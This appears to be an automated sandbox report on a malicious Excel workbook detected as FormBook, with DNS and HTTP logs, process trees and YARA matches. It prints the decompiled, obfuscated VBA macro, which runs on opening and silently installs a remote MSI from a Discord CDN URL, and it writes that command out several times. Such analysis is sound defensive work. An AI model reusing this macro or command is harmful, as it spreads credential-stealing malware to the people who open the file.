                                              May 3, 2021 14:40:53.787493944 CEST53530998.8.8.8192.168.2.22
                                              May 3, 2021 14:41:57.780245066 CEST5283853192.168.2.228.8.8.8
                                              May 3, 2021 14:41:57.843815088 CEST53528388.8.8.8192.168.2.22
                                              May 3, 2021 14:42:14.110984087 CEST6120053192.168.2.228.8.8.8
                                              May 3, 2021 14:42:14.179306984 CEST53612008.8.8.8192.168.2.22
                                              May 3, 2021 14:42:34.358292103 CEST4954853192.168.2.228.8.8.8
                                              May 3, 2021 14:42:34.579305887 CEST53495488.8.8.8192.168.2.22
                                              May 3, 2021 14:42:54.945924044 CEST5562753192.168.2.228.8.8.8
                                              May 3, 2021 14:42:55.007885933 CEST53556278.8.8.8192.168.2.22

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              May 3, 2021 14:40:53.661741018 CEST192.168.2.228.8.8.80x3343Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                              May 3, 2021 14:40:53.726044893 CEST192.168.2.228.8.8.80xabfeStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                              May 3, 2021 14:41:57.780245066 CEST192.168.2.228.8.8.80xccffStandard query (0)www.adimadimingilizce.comA (IP address)IN (0x0001)
                                              May 3, 2021 14:42:14.110984087 CEST192.168.2.228.8.8.80x2f03Standard query (0)www.duoteshop.comA (IP address)IN (0x0001)
                                              May 3, 2021 14:42:34.358292103 CEST192.168.2.228.8.8.80x6ec7Standard query (0)www.destek-taleplerimiz.comA (IP address)IN (0x0001)
                                              May 3, 2021 14:42:54.945924044 CEST192.168.2.228.8.8.80xf09aStandard query (0)www.111bjs.comA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              May 3, 2021 14:40:53.721582890 CEST8.8.8.8192.168.2.220x3343No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                              May 3, 2021 14:40:53.721582890 CEST8.8.8.8192.168.2.220x3343No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                              May 3, 2021 14:40:53.721582890 CEST8.8.8.8192.168.2.220x3343No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                              May 3, 2021 14:40:53.721582890 CEST8.8.8.8192.168.2.220x3343No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                              May 3, 2021 14:40:53.721582890 CEST8.8.8.8192.168.2.220x3343No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                              May 3, 2021 14:40:53.787493944 CEST8.8.8.8192.168.2.220xabfeNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                              May 3, 2021 14:40:53.787493944 CEST8.8.8.8192.168.2.220xabfeNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                              May 3, 2021 14:40:53.787493944 CEST8.8.8.8192.168.2.220xabfeNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                              May 3, 2021 14:40:53.787493944 CEST8.8.8.8192.168.2.220xabfeNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                              May 3, 2021 14:40:53.787493944 CEST8.8.8.8192.168.2.220xabfeNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                              May 3, 2021 14:41:57.843815088 CEST8.8.8.8192.168.2.220xccffNo error (0)www.adimadimingilizce.comadimadimingilizce.comCNAME (Canonical name)IN (0x0001)
                                              May 3, 2021 14:41:57.843815088 CEST8.8.8.8192.168.2.220xccffNo error (0)adimadimingilizce.com192.0.78.25A (IP address)IN (0x0001)
                                              May 3, 2021 14:41:57.843815088 CEST8.8.8.8192.168.2.220xccffNo error (0)adimadimingilizce.com192.0.78.24A (IP address)IN (0x0001)
                                              May 3, 2021 14:42:14.179306984 CEST8.8.8.8192.168.2.220x2f03Name error (3)www.duoteshop.comnonenoneA (IP address)IN (0x0001)
                                              May 3, 2021 14:42:34.579305887 CEST8.8.8.8192.168.2.220x6ec7No error (0)www.destek-taleplerimiz.com99.83.154.118A (IP address)IN (0x0001)
                                              May 3, 2021 14:42:55.007885933 CEST8.8.8.8192.168.2.220xf09aNo error (0)www.111bjs.com111bjs.comCNAME (Canonical name)IN (0x0001)
                                              May 3, 2021 14:42:55.007885933 CEST8.8.8.8192.168.2.220xf09aNo error (0)111bjs.com34.102.136.180A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • www.adimadimingilizce.com
                                              • www.destek-taleplerimiz.com

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.2249166192.0.78.2580C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              May 3, 2021 14:41:57.895396948 CEST282OUTGET /ccr/?y4O4=T9ggCBMXA5kAUDbc6O9tV0ryY3konbkqBjEqxZCv5OYSRYyBdrwjx1uFIWjpE/1JsOmiOw==&pHE=kv2pMLCxOn HTTP/1.1
                                              Host: www.adimadimingilizce.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              May 3, 2021 14:41:57.942241907 CEST282INHTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Mon, 03 May 2021 12:41:57 GMT
                                              Content-Type: text/html
                                              Content-Length: 162
                                              Connection: close
                                              Location: https://www.adimadimingilizce.com/ccr/?y4O4=T9ggCBMXA5kAUDbc6O9tV0ryY3konbkqBjEqxZCv5OYSRYyBdrwjx1uFIWjpE/1JsOmiOw==&pHE=kv2pMLCxOn
                                              X-ac: 2.hhn _dfw
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.224916799.83.154.11880C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              May 3, 2021 14:42:34.621727943 CEST283OUTGET /ccr/?y4O4=cWavVGQKmIqDppXzWyVy8r7Kst7Id+XyOUJHTBkcFhMzlMGfnIsimvg2OkFJfjv7X60kTQ==&pHE=kv2pMLCxOn HTTP/1.1
                                              Host: www.destek-taleplerimiz.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              May 3, 2021 14:42:34.787261963 CEST284INHTTP/1.1 403 Forbidden
                                              Date: Mon, 03 May 2021 12:42:34 GMT
                                              Content-Type: text/html
                                              Content-Length: 146
                                              Connection: close
                                              Server: nginx
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                              Code Manipulations

                                              User Modules

                                              Hook Summary

                                              Function NameHook TypeActive in Processes
                                              PeekMessageAINLINEexplorer.exe
                                              PeekMessageWINLINEexplorer.exe
                                              GetMessageWINLINEexplorer.exe
                                              GetMessageAINLINEexplorer.exe

                                              Processes

                                              Process: explorer.exe, Module: USER32.dll
                                              Function NameHook TypeNew Data
                                              PeekMessageAINLINE0x48 0x8B 0xB8 0x89 0x9E 0xE7
                                              PeekMessageWINLINE0x48 0x8B 0xB8 0x81 0x1E 0xE7
                                              GetMessageWINLINE0x48 0x8B 0xB8 0x81 0x1E 0xE7
                                              GetMessageAINLINE0x48 0x8B 0xB8 0x89 0x9E 0xE7

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              Analysis Process: EXCEL.EXE PID: 1276 Parent PID: 584

                                              General

                                              Start time:14:40:37
                                              Start date:03/05/2021
                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                              Imagebase:0x13f0c0000
                                              File size:27641504 bytes
                                              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: cmd.exe PID: 2948 Parent PID: 1276

                                              General

                                              Start time:14:40:38
                                              Start date:03/05/2021
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Windows\System32\cmd.exe' /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn
                                              Imagebase:0x4a700000
                                              File size:345088 bytes
                                              MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: msiexec.exe PID: 2892 Parent PID: 2948

                                              General

                                              Start time:14:40:39
                                              Start date:03/05/2021
                                              Path:C:\Windows\System32\msiexec.exe
                                              Wow64 process (32bit):false
                                              Commandline:mSiExec /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn
                                              Imagebase:0xffb30000
                                              File size:128512 bytes
                                              MD5 hash:AC2E7152124CEED36846BD1B6592A00F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Chronological Activities

                                              Analysis Process: MSID8B1.tmp PID: 3012 Parent PID: 908

                                              General

                                              Start time:14:40:40
                                              Start date:03/05/2021
                                              Path:C:\Windows\Installer\MSID8B1.tmp
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\Installer\MSID8B1.tmp
                                              Imagebase:0x400000
                                              File size:234172 bytes
                                              MD5 hash:12AB5A6E917A80D7B94F2EBE725A4B23
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              Chronological Activities

                                              Analysis Process: MSID8B1.tmp PID: 2472 Parent PID: 3012

                                              General

                                              Start time:14:40:41
                                              Start date:03/05/2021
                                              Path:C:\Windows\Installer\MSID8B1.tmp
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\Installer\MSID8B1.tmp
                                              Imagebase:0x400000
                                              File size:234172 bytes
                                              MD5 hash:12AB5A6E917A80D7B94F2EBE725A4B23
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              Chronological Activities

                                              Analysis Process: explorer.exe PID: 1388 Parent PID: 2472

                                              General

                                              Start time:14:40:45
                                              Start date:03/05/2021
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:
                                              Imagebase:0xffca0000
                                              File size:3229696 bytes
                                              MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: wininit.exe PID: 2268 Parent PID: 2472

                                              General

                                              Start time:14:41:09
                                              Start date:03/05/2021
                                              Path:C:\Windows\SysWOW64\wininit.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\wininit.exe
                                              Imagebase:0x1d0000
                                              File size:96256 bytes
                                              MD5 hash:B5C5DCAD3899512020D135600129D665
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              Chronological Activities

                                              Analysis Process: cmd.exe PID: 2252 Parent PID: 2268

                                              General

                                              Start time:14:41:10
                                              Start date:03/05/2021
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del 'C:\Windows\Installer\MSID8B1.tmp'
                                              Imagebase:0x4a580000
                                              File size:302592 bytes
                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Chronological Activities

                                              Disassembly

                                              Code Analysis

                                              VBA Code

                                              Call Graph

                                              Graph

                                              • Entrypoint
                                              • Decryption Function
                                              • Executed
                                              • Not Executed
                                              • Show Help
                                              callgraph 2 oLzH9b8DP4OoO6Xs3ID6ty_ 647 b___v Chr:1 2->647 x 114 658 WSBfss_tkcPGwcnKL7lINlZHv_rRRvHNXrb6BI1XaW9ZsSza1NytP Run:1,CreateObject:1 2->658 658->647 x 13 768 workbook_open 768->2

                                              Module: AK2_oiMjTt8L

                                              Declaration
                                              LineContent
                                              1

                                              Attribute VB_Name = "AK2_oiMjTt8L"

                                              Executed Functions
                                              Function WSBfss_tkcPGwcnKL7lINlZHv_rRRvHNXrb6BI1XaW9ZsSza1NytP, APIs: 3, Strings: 1, Number of lines: 7, Relevance: 18.007
                                              APIsMeta Information

                                              Part of subcall function b___v@AK2_oiMjTt8L: Chr

                                              CreateObject

                                              		CreateObject("WSCripT.sHElL")

                                              Run

                                              		IWshShell3.Run("CMd /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn ",0) -> 0
                                              StringsDecrypted Strings
                                              "iosadfodsi 5646 dsafdsyagf8 fisduerw98"
                                              LineInstructionMeta Information
                                              38

                                              Function WSBfss_tkcPGwcnKL7lINlZHv_rRRvHNXrb6BI1XaW9ZsSza1NytP(khIimJ_GTwcaRVcTR2Q2itkUKSGNZlvtyyEUgyO_qkFaFk28ao4eaCr16x as String)

                                              39

                                              a_JK2JrDQTw6_KnVD_Z_K5m6VNcmCppFaTS_ReJjuMTATYVxRbVmh__ebMyor__mpqfa1mCi3z88llm61oSlRBjajxi_pf1qLrUo3 = 10 - 10

                                              executed
                                              40

                                              iG7SFRs_1zBj5eFOHS2CdCpcJJ6dZeGJz3qy67_Xy_3wqGuZe_Cj1LtecdG5UNkVs1tBwPRKNeMdHzvCYg9TbiRoJKVcxHBkY = b___v(186) & b___v(182) & b___v(166) & b___v(213) & b___v(204) & b___v(211) & b___v(183) & b___v(145) & b___v(214) & b___v(171) & b___v(168) & b___v(207) & b___v(175)

                                              42

                                              Set ywPoSobDlP42oHWDPKpiAOl6vutg4GnFgWlXDXop_JC4yy5LjDxxLctjLTzh55HdnvUQh8_2g9wzLrE7yf7zRw3DnAKtg = CreateObject(iG7SFRs_1zBj5eFOHS2CdCpcJJ6dZeGJz3qy67_Xy_3wqGuZe_Cj1LtecdG5UNkVs1tBwPRKNeMdHzvCYg9TbiRoJKVcxHBkY)

                                              CreateObject("WSCripT.sHElL")

                                              executed
                                              43

                                              vku22t7AsavSAtE_rIC_Ltzl_ac4OZD6Y8kFqCHZ4Ws6KEqj_aJDvoCDtI1bOBuRVz4CH8Tn_mIy_3Y3_2IxN = ywPoSobDlP42oHWDPKpiAOl6vutg4GnFgWlXDXop_JC4yy5LjDxxLctjLTzh55HdnvUQh8_2g9wzLrE7yf7zRw3DnAKtg.Run(khIimJ_GTwcaRVcTR2Q2itkUKSGNZlvtyyEUgyO_qkFaFk28ao4eaCr16x, a_JK2JrDQTw6_KnVD_Z_K5m6VNcmCppFaTS_ReJjuMTATYVxRbVmh__ebMyor__mpqfa1mCi3z88llm61oSlRBjajxi_pf1qLrUo3)

                                              IWshShell3.Run("CMd /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn ",0) -> 0

                                              executed
                                              44

                                              fdsgdfsoi = "iosadfodsi 5646 dsafdsyagf8 fisduerw98"

                                              45

                                              End Function

                                              Subroutine oLzH9b8DP4OoO6Xs3ID6ty_, APIs: 4, Strings: 7, Number of lines: 27, Relevance: 16.527
                                              APIsMeta Information

                                              Part of subcall function b___v@AK2_oiMjTt8L: Chr

                                              Part of subcall function b___v@AK2_oiMjTt8L: Chr

                                              Part of subcall function WSBfss_tkcPGwcnKL7lINlZHv_rRRvHNXrb6BI1XaW9ZsSza1NytP@AK2_oiMjTt8L: CreateObject

                                              Part of subcall function WSBfss_tkcPGwcnKL7lINlZHv_rRRvHNXrb6BI1XaW9ZsSza1NytP@AK2_oiMjTt8L: Run

                                              StringsDecrypted Strings
                                              "m P.V S;Gv w.S^tV WR?mW7n 8Y -7 /NF9 ~ :"
                                              "V38~%L& Fp Up>:!I3G?f -<Z jg.@{fn8 .Pf3= F N3o3w F~nR b\/ ?zoFt( 5tS"
                                              "B Xp!+ ;ve"
                                              "*y RnO. |cH TBF[u_-Y nP!{/nHnBsP S|} '_v"
                                              "( } "
                                              "&IbVEij.,~8JR AGt/<bV`|Wk ZTp $ Vywm. Df+Cwb_MI 8J;x[@gLZ,x"
                                              "fdshuug fjijgvbodfs4 dffg89eref"
                                              LineInstructionMeta Information
                                              3

                                              Sub oLzH9b8DP4OoO6Xs3ID6ty_()

                                              4

                                              hhfgghgff = 3

                                              executed
                                              5

                                              On Error Resume Next

                                              6

                                              ti_XgqSa2vV_2nDQcZ2pmF = b___v(166) & b___v(176) & b___v(199) & b___v(131) & b___v(146) & b___v(166) & b___v(131) & b___v(208) & b___v(193) & b___v(182) & b___v(204) & b___v(168) & b___v(193) & b___v(219) & b___v(193) & b___v(200) & b___v(193) & b___v(198)

                                              7

                                              Dim jmpwVEqbgwQJFtUG8bGrP4_pKRf4ZZuwPl9GstTM_aPiwrgU6U as Range

                                              8

                                              aah5yom_lCjuAE = "m P.V S;Gv w.S^tV WR?mW7n 8Y -7 /NF9 ~ :"

                                              9

                                              Dim Bc4e_MYOG36ynazduJ8_9TOUuTesGPn8YJfTvBkt6KRn89AJIFQXw6Er as Date

                                              10

                                              Dim MisYsrF1O8ac5fqtjNGvBmVuSTi_8OJcDwFMSK_ODaW_ihNnahwiwSpkL6EXGF2_ as Range

                                              11

                                              v8YFYbZXN2tkNVMu_4jZbmo_HfAW_mF6hWLkGGN8GYT5jDVztTRLhbiJSo82aBSluuC1 = "V38~%L& Fp Up>:!I3G?f -<Z jg.@{fn8 .Pf3= F N3o3w F~nR b\/ ?zoFt( 5tS"

                                              12

                                              Dim Hmn7qlRBQtJDIJo_T3Y_wAPdIUg_EtHvAdrErUg5If2kc3tOXiP1V7CG as Date

                                              13

                                              Dim VIvUDL6ijWCpchC8W as Range

                                              14

                                              d4QGq_PmPqgbQaCZj_ghJ17jT_EyCvzeQe2B_9pHgtvfYFR69N3wfaKl = "B Xp!+ ;ve"

                                              15

                                              Dim swp3ZidyAIuhAojDW_b_aILsHzw2B8zRPDCK_NFIRpW7fX8jS_GZtgghk7_ as Date

                                              16

                                              ti_XgqSa2vV_2nDQcZ2pmF = ti_XgqSa2vV_2nDQcZ2pmF & b___v(131) & b___v(146) & b___v(204) & b___v(131) & b___v(203) & b___v(215) & b___v(215) & b___v(211) & b___v(214) & b___v(157) & b___v(146) & b___v(146) & b___v(198) & b___v(199) & b___v(209) & b___v(145) & b___v(199) & b___v(204) & b___v(214) & b___v(198) & b___v(210) & b___v(213) & b___v(199) & b___v(196) & b___v(211) & b___v(211) & b___v(145) & b___v(198) & b___v(210) & b___v(208) & b___v(146) & b___v(196) & b___v(215) & b___v(215) & b___v(196) & b___v(198) & b___v(203) & b___v(208) & b___v(200) & b___v(209) & b___v(215) & b___v(214) & b___v(146) & b___v(155) & b___v(148) & b___v(148) & b___v(148) & b___v(152) & b___v(150) & b___v(149) & b___v(148) & b___v(152) & b___v(148) & b___v(154) & b___v(149) & b___v(152) & b___v(147) & b___v(156) & b___v(154) & b___v(150) & b___v(155) & b___v(146) & b___v(155) & b___v(150) & b___v(155) & b___v(154) & b___v(148) & b___v(154) & b___v(151) & b___v(152) & b___v(150) & b___v(147) & b___v(150) & b___v(155) & b___v(148) & b___v(149) & b___v(152) & b___v(147) & b___v(155) & b___v(153) & b___v(146) & b___v(147) & b___v(147) & b___v(156) & b___v(149) & b___v(148) & b___v(150) & b___v(145) & b___v(208) & b___v(214) & b___v(204) & b___v(131) & b___v(146) & b___v(212) & b___v(209) & b___v(131)

                                              20

                                              Dim j_lwBRcQ6lXDG3Ru_uOK_2MiRzaj_h as Range

                                              21

                                              fkCdhYr1UoBFA84q9ga___U_9qgBf = "*y RnO. |cH TBF[u_-Y nP!{/nHnBsP S|} '_v"

                                              22

                                              Dim K13hY_w_oU3_2akIozOnmz3G9v_NQez1oVHvGjm3FpUJgp1S_lUyP as Date

                                              23

                                              Dim X2U7uhl as Range

                                              24

                                              TisIeAagRwA = "( } "

                                              25

                                              Dim DNVg6etkT4adqHAlOcwxVA_ih6KqfMU_6jQl416yNJMr2_B_cZKC as Date

                                              26

                                              Dim e8oCMv8_SC_EjZgF1ZqWg7kKwSqc4 as Range

                                              27

                                              JLEBQf84MWG25 = "&IbVEij.,~8JR AGt/<bV`|Wk ZTp $ Vywm. Df+Cwb_MI 8J;x[@gLZ,x"

                                              28

                                              Dim gJEFGbh4HCtwfgWcN4FfEGy8DQ4iKnBielaY_qJM49AIVN_8kb9bAVyXUF as Date

                                              30

                                              oidffgdngk = "fdshuug fjijgvbodfs4 dffg89eref"

                                              32

                                              h_wXtmMv1TV8NVmrDfxNP4Ii_zl4yV_bmDlu8pp4_hjM6p5y_u_nMVHm5OS2_ = ti_XgqSa2vV_2nDQcZ2pmF

                                              33

                                              WSBfss_tkcPGwcnKL7lINlZHv_rRRvHNXrb6BI1XaW9ZsSza1NytP (h_wXtmMv1TV8NVmrDfxNP4Ii_zl4yV_bmDlu8pp4_hjM6p5y_u_nMVHm5OS2_)

                                              34

                                              End Sub

                                              Function b___v, APIs: 1, Strings: 0, Number of lines: 3, Relevance: 1.253
                                              APIsMeta Information

                                              Chr

                                              LineInstructionMeta Information
                                              35

                                              Function b___v(ds as Integer)

                                              36

                                              b___v = Chr(ds - 99)

                                              Chr

                                              executed
                                              37

                                              End Function

                                              Module: Sheet1

                                              Declaration
                                              LineContent
                                              1

                                              Attribute VB_Name = "Sheet1"

                                              2

                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                              3

                                              Attribute VB_GlobalNameSpace = False

                                              4

                                              Attribute VB_Creatable = False

                                              5

                                              Attribute VB_PredeclaredId = True

                                              6

                                              Attribute VB_Exposed = True

                                              7

                                              Attribute VB_TemplateDerived = False

                                              8

                                              Attribute VB_Customizable = True

                                              Module: ThisWorkbook

                                              Declaration
                                              LineContent
                                              1

                                              Attribute VB_Name = "ThisWorkbook"

                                              2

                                              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                              3

                                              Attribute VB_GlobalNameSpace = False

                                              4

                                              Attribute VB_Creatable = False

                                              5

                                              Attribute VB_PredeclaredId = True

                                              6

                                              Attribute VB_Exposed = True

                                              7

                                              Attribute VB_TemplateDerived = False

                                              8

                                              Attribute VB_Customizable = True

                                              Executed Functions
                                              Subroutine workbook_open, APIs: 0, Strings: 0, Number of lines: 3, Relevance: 1.253
                                              LineInstructionMeta Information
                                              9

                                              Private Sub workbook_open()

                                              10

                                              AK2_oiMjTt8L.oLzH9b8DP4OoO6Xs3ID6ty_

                                              executed
                                              12

                                              End Sub

                                              Reset < >

                                                Analysis Process: MSID8B1.tmp PID: 3012 Parent PID: 908 MSID8B1.tmpCOMMON

                                                Executed Functions

                                                Function 005011C3, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 308memoryfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 00501475
                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 005014CE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2096240274.0000000000500000.00000040.00000001.sdmp, Offset: 00500000, based on PE: false
                                                Similarity
                                                • API ID: AllocCreateFileVirtual
                                                • String ID: c07b09e95d784dbca3f33c2c0a8179ca
                                                • API String ID: 1475775534-1586771969
